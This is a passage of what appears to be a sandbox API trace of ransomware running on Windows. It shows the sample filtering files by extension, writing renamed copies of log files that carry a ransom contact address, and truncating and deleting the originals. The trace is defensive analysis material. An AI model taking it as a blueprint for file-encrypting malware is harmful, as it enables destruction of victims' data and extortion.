(lpString1=".pdf", lpString2=".mzz") returned 1 [0064.618] lstrlenW (lpString=".xls") returned 4 [0064.618] lstrcmpiW (lpString1=".xls", lpString2=".mzz") returned 1 [0064.618] lstrlenW (lpString=".xlsx") returned 5 [0064.618] lstrcmpiW (lpString1=".xlsx", lpString2="d.mzz") returned -1 [0064.618] lstrlenW (lpString=".ppt") returned 4 [0064.618] lstrcmpiW (lpString1=".ppt", lpString2=".mzz") returned 1 [0064.618] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.618] lstrlenW (lpString=".zip") returned 4 [0064.618] lstrcmpiW (lpString1=".zip", lpString2=".mzz") returned 1 [0064.618] lstrlenW (lpString=".rar") returned 4 [0064.618] lstrcmpiW (lpString1=".rar", lpString2=".mzz") returned 1 [0064.618] lstrlenW (lpString=".bz2") returned 4 [0064.618] lstrcmpiW (lpString1=".bz2", lpString2=".mzz") returned -1 [0064.618] lstrlenW (lpString=".7z") returned 3 [0064.618] lstrcmpiW (lpString1=".7z", lpString2="mzz") returned -1 [0064.618] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.618] lstrlenW (lpString=".dbf") returned 4 [0064.618] lstrcmpiW (lpString1=".dbf", lpString2=".mzz") returned -1 [0064.618] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.618] lstrlenW (lpString=".1cd") returned 4 [0064.618] lstrcmpiW (lpString1=".1cd", lpString2=".mzz") returned -1 [0064.618] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0064.618] lstrlenW (lpString=".jpg") returned 4 [0064.618] lstrcmpiW (lpString1=".jpg", lpString2=".mzz") returned -1 [0064.619] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.619] lstrlenW (lpString="Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 41 [0064.619] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0064.619] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0064.619] CloseHandle (hObject=0x32c) returned 1 [0064.619] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx")) returned 0x20 [0064.619] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.619] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0064.619] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.620] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.620] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0064.620] GetLastError () returned 0x0 [0064.620] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0064.623] WriteFile (in: hFile=0x39c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0064.625] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.625] WriteFile (in: hFile=0x39c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x126, lpOverlapped=0x0) returned 1 [0064.625] SetEndOfFile (hFile=0x39c) returned 1 [0064.625] CloseHandle (hObject=0x39c) returned 1 [0064.627] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.627] SetEndOfFile (hFile=0x32c) returned 1 [0064.629] CloseHandle (hObject=0x32c) returned 1 [0064.629] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.629] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx")) returned 1 [0064.630] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.630] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.630] lstrlenW (lpString=".doc") returned 4 [0064.630] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.630] lstrlenW (lpString=".docx") returned 5 [0064.630] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.630] lstrlenW (lpString=".pdf") returned 4 [0064.630] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.630] lstrlenW (lpString=".xls") returned 4 [0064.630] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.630] lstrlenW (lpString=".xlsx") returned 5 [0064.630] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.630] lstrlenW (lpString=".ppt") returned 4 [0064.630] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.630] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.630] lstrlenW (lpString=".zip") returned 4 [0064.630] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.630] lstrlenW (lpString=".rar") returned 4 [0064.630] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.630] lstrlenW (lpString=".bz2") returned 4 [0064.630] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.630] lstrlenW (lpString=".7z") returned 3 [0064.630] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.631] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.631] lstrlenW (lpString=".dbf") returned 4 [0064.631] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.631] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.631] lstrlenW (lpString=".1cd") returned 4 [0064.631] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.631] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.631] lstrlenW (lpString=".jpg") returned 4 [0064.631] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.631] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.631] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.631] lstrlenW (lpString=".doc") returned 4 [0064.631] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.631] lstrlenW (lpString=".docx") returned 5 [0064.631] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.631] lstrlenW (lpString=".pdf") returned 4 [0064.631] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.631] lstrlenW (lpString=".xls") returned 4 [0064.631] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.631] lstrlenW (lpString=".xlsx") returned 5 [0064.631] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.631] lstrlenW (lpString=".ppt") returned 4 [0064.631] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.631] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.631] lstrlenW (lpString=".zip") returned 4 [0064.631] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.631] lstrlenW (lpString=".rar") returned 4 [0064.631] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.632] lstrlenW (lpString=".bz2") returned 4 [0064.632] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.632] lstrlenW (lpString=".7z") returned 3 [0064.632] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.632] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.632] lstrlenW (lpString=".dbf") returned 4 [0064.632] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.632] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.632] lstrlenW (lpString=".1cd") returned 4 [0064.632] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.632] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 49 [0064.632] lstrlenW (lpString=".jpg") returned 4 [0064.632] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.632] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.632] lstrlenW (lpString="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 43 [0064.632] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0064.632] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0064.633] CloseHandle (hObject=0x32c) returned 1 [0064.633] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx")) returned 0x20 [0064.633] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.633] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0064.633] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.633] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.633] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0064.633] GetLastError () returned 0x0 [0064.633] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0064.653] WriteFile (in: hFile=0x39c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0064.654] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.654] WriteFile (in: hFile=0x39c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x12a, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x12a, lpOverlapped=0x0) returned 1 [0064.655] SetEndOfFile (hFile=0x39c) returned 1 [0064.655] CloseHandle (hObject=0x39c) returned 1 [0064.657] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.657] SetEndOfFile (hFile=0x32c) returned 1 [0064.658] CloseHandle (hObject=0x32c) returned 1 [0064.658] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.658] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx")) returned 1 [0064.659] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.659] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.659] lstrlenW (lpString=".doc") returned 4 [0064.659] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.659] lstrlenW (lpString=".docx") returned 5 [0064.659] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.659] lstrlenW (lpString=".pdf") returned 4 [0064.659] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.659] lstrlenW (lpString=".xls") returned 4 [0064.659] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.659] lstrlenW (lpString=".xlsx") returned 5 [0064.659] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.659] lstrlenW (lpString=".ppt") returned 4 [0064.659] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.659] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.659] lstrlenW (lpString=".zip") returned 4 [0064.659] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.659] lstrlenW (lpString=".rar") returned 4 [0064.659] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.659] lstrlenW (lpString=".bz2") returned 4 [0064.659] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.659] lstrlenW (lpString=".7z") returned 3 [0064.659] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.659] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.659] lstrlenW (lpString=".dbf") returned 4 [0064.659] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.659] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.659] lstrlenW (lpString=".1cd") returned 4 [0064.659] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.660] lstrlenW (lpString=".jpg") returned 4 [0064.660] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.660] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.660] lstrlenW (lpString=".doc") returned 4 [0064.660] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString=".docx") returned 5 [0064.660] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.660] lstrlenW (lpString=".pdf") returned 4 [0064.660] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString=".xls") returned 4 [0064.660] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString=".xlsx") returned 5 [0064.660] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.660] lstrlenW (lpString=".ppt") returned 4 [0064.660] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.660] lstrlenW (lpString=".zip") returned 4 [0064.660] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString=".rar") returned 4 [0064.660] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString=".bz2") returned 4 [0064.660] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString=".7z") returned 3 [0064.660] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.660] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.660] lstrlenW (lpString=".dbf") returned 4 [0064.660] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.660] lstrlenW (lpString=".1cd") returned 4 [0064.660] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.660] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0064.660] lstrlenW (lpString=".jpg") returned 4 [0064.660] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.661] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0064.661] lstrlenW (lpString="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 49 [0064.661] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0064.662] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x334ff14 | out: lpFileSize=0x334ff14*=69632) returned 1 [0064.662] CloseHandle (hObject=0x32c) returned 1 [0064.662] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx")) returned 0x20 [0064.662] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0064.662] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0064.662] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.662] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.662] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0064.663] GetLastError () returned 0x0 [0064.663] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x11000, lpOverlapped=0x0) returned 1 [0064.665] WriteFile (in: hFile=0x39c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x11010, lpOverlapped=0x0) returned 1 [0064.667] ReadFile (in: hFile=0x32c, lpBuffer=0x4026020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x334fecc, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesRead=0x334fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.667] WriteFile (in: hFile=0x39c, lpBuffer=0x4026020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x334fc94, lpOverlapped=0x0 | out: lpBuffer=0x4026020*, lpNumberOfBytesWritten=0x334fc94*=0x136, lpOverlapped=0x0) returned 1 [0064.667] SetEndOfFile (hFile=0x39c) returned 1 [0064.667] CloseHandle (hObject=0x39c) returned 1 [0064.669] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x334fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.669] SetEndOfFile (hFile=0x32c) returned 1 [0064.670] CloseHandle (hObject=0x32c) returned 1 [0064.670] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0064.671] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnosis-dps%4operational.evtx")) returned 1 [0064.671] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.671] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.671] lstrlenW (lpString=".doc") returned 4 [0064.671] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.671] lstrlenW (lpString=".docx") returned 5 [0064.671] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.671] lstrlenW (lpString=".pdf") returned 4 [0064.671] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.671] lstrlenW (lpString=".xls") returned 4 [0064.671] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.671] lstrlenW (lpString=".xlsx") returned 5 [0064.671] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.671] lstrlenW (lpString=".ppt") returned 4 [0064.671] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.671] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.671] lstrlenW (lpString=".zip") returned 4 [0064.671] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.672] lstrlenW (lpString=".rar") returned 4 [0064.672] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.672] lstrlenW (lpString=".bz2") returned 4 [0064.672] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.672] lstrlenW (lpString=".7z") returned 3 [0064.672] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.672] lstrlenW (lpString=".dbf") returned 4 [0064.672] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.672] lstrlenW (lpString=".1cd") returned 4 [0064.672] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.672] lstrlenW (lpString=".jpg") returned 4 [0064.672] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.672] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.672] lstrlenW (lpString=".doc") returned 4 [0064.672] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0064.672] lstrlenW (lpString=".docx") returned 5 [0064.672] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0064.672] lstrlenW (lpString=".pdf") returned 4 [0064.672] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0064.672] lstrlenW (lpString=".xls") returned 4 [0064.672] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0064.672] lstrlenW (lpString=".xlsx") returned 5 [0064.672] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0064.672] lstrlenW (lpString=".ppt") returned 4 [0064.673] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0064.673] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.673] lstrlenW (lpString=".zip") returned 4 [0064.673] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0064.673] lstrlenW (lpString=".rar") returned 4 [0064.673] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0064.673] lstrlenW (lpString=".bz2") returned 4 [0064.673] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0064.673] lstrlenW (lpString=".7z") returned 3 [0064.673] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0064.673] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.673] lstrlenW (lpString=".dbf") returned 4 [0064.673] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0064.673] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.673] lstrlenW (lpString=".1cd") returned 4 [0064.673] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0064.673] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0064.673] lstrlenW (lpString=".jpg") returned 4 [0064.673] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0064.673] lstrcmpiW 